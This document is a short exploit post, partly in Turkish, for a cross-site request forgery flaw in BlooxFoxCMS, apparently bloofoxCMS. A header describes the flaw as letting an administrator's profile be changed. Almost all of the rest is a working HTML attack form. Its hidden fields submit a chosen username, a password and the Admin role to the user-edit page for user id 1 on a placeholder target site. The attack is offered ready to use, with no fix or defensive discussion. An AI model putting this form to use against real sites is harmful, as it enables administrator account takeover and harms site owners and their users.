< ------------------- header data start ------------------- >


#############################################################

# Application Name : BlooxFoxCMS

# Vulnerable Type : XSRF

# Infection : Administrator Profile Bilgileri Change Edilebilir.

# author : CWCaspeR - Bug Researchers

# Demo : http://demo.bloofox.com/admin/index.php?mode=user&action=edit&userid=1

#############################################################


< ------------------- header data end of ------------------- >


<form action=http://HEDEFSITE.COM/admin/index.php?mode=user&action=edit&userid=1 method=post>
<input type=’Hidden’ name=’username’ size=’25’ maxlength=’250’ value=’KULLANICIADI’ />
<input type=’Hidden’ name=’password’ size=’25’ maxlength=’250’ value=’SIFRENIZ’ />
<input type=’Hidden’ name=’pwdconfirm’ size=’25’ maxlength=’250’ value=’SIFRENIZ’ />
<input type=’hidden’ name=’1’ value=’User’ />
<input type=’hidden’ name=’2’ value=’Editor’ />
<input type=’hidden’ name=’3’ value=’Admin’ checked=’checked’ />
<input type=’hidden’ name=’4’ value=’Demo’ />
<input type=hidden name=blocked value=0>
<input type=hidden name=deleted value=0>
<input type=hidden name=status value=1>
<input type=hidden name=login_page value=0>
<input type=’hidden’ name=’userid’ value=’1’ />
<input class=’btn’ type=’submit’ name=’send’ value=’BUTONADI’ />
</form>

< -- bug code end of -- >